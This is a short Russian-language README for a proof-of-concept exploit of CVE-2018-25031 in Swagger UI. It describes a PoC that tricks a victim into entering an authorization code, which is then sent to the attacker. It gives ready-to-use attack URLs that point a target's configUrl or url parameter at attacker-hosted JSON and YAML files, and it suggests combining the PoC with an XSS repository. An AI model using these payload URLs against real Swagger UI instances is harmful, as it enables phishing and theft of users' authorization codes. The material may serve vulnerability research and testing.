
Эксплойт proof-of-concept для CVE-2018-25031 (XSS в Swagger UI), который извлекает коды авторизации через специально созданные параметры configUrl/url.
Простой POC (CVE-2018-25031), который заставляет жертву ввести код авторизации, который затем отправляется атакующему.
Вы можете использовать его совместно с XSS-уязвимостью https://github.com/VictorNS69/swagger-ui-xss
Необходимо найти параметр и указать правильный файл: для configUrl — JSON-файл, а для url — YAML-файл.
https://<URL>/?configUrl=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.json
https://<URL>/?url=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.yaml
https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://github.com/mathis2001/CVE-2018-25031